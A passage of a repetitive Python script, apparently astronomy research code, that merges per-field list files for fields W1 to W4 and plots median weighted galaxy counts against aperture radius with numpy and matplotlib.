infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist50try_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nplt.suptitle(r'%s weighted counts for W1-W4: median with radius' % str(sys.argv[1]), fontsize=10, y=0.998)\n\n\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n#s = \"50: %.3f,%.3f,%.3f\" % (np.median(q_W1_50_120),np.average(q_W1_50_120),np.median(q_W1_50_120)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.ylabel('$\\zeta_{gal}$', fontsize=15)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 1\n\ncols=3\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size90_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_90 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size60_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_60 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_75_45 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_75_%s_%s_size45_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_75_45 = q_read[q_read < 10]\n\nx = linspace(0,2,500)\n\n\n\nplt.subplot(452)\nrangemax=2\nplt.xlim(25,140)\n#plt.scatter(45, np.median(q_W1_50_45), color='b', label='W1_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W2_50_45), color='g', label='W2_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W3_50_45), color='r', label='W3_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W4_50_45), color='k', label='W4_50', linewidth=0.5)\n#plt.scatter(45, np.median(q_W1_75_45), color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W2_75_45), color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W3_75_45), color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(45, np.median(q_W4_75_45), color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W1_50_45),np.median(q_W1_50_60),np.median(q_W1_50_90),np.median(q_W1_50_120)], color='b', label='W1_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W2_50_45),np.median(q_W2_50_60),np.median(q_W2_50_90),np.median(q_W2_50_120)], color='g', label='W2_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W3_50_45),np.median(q_W3_50_60),np.median(q_W3_50_90),np.median(q_W3_50_120)], color='r', label='W3_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W4_50_45),np.median(q_W4_50_60),np.median(q_W4_50_90),np.median(q_W4_50_120)], color='k', label='W4_50', linewidth=0.5)\nplt.plot([45,60,90,120], [np.median(q_W1_75_45),np.median(q_W1_75_60),np.median(q_W1_75_90),np.median(q_W1_75_120)], color='b', label='W1_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W2_75_45),np.median(q_W2_75_60),np.median(q_W2_75_90),np.median(q_W2_75_120)], color='g', label='W2_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W3_75_45),np.median(q_W3_75_60),np.median(q_W3_75_90),np.median(q_W3_75_120)], color='r', label='W3_75', linewidth=0.5, linestyle='dotted')\nplt.plot([45,60,90,120], [np.median(q_W4_75_45),np.median(q_W4_75_60),np.median(q_W4_75_90),np.median(q_W4_75_120)], color='k', label='W4_75', linewidth=0.5, linestyle='dotted')\n#plt.scatter(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(452)\n#s = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\n#ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\nplt.ylabel(r'$\\zeta_\\frac{1}{r}$', fontsize=15)\nplt.xlabel(\"radius [arcsec]\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 2\n\ncols=5\nq_read = np.loadtxt('fieldshistW1_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW2_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W2_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW3_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W3_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW4_50_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W4_50_120 = q_read[q_read < 10]\nq_read = np.loadtxt('fieldshistW1_75_%s_%s_size120_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[3])), usecols=[cols], unpack=True)\nq_W1_75_120 = q_read[q_read < 10]\nq_read = 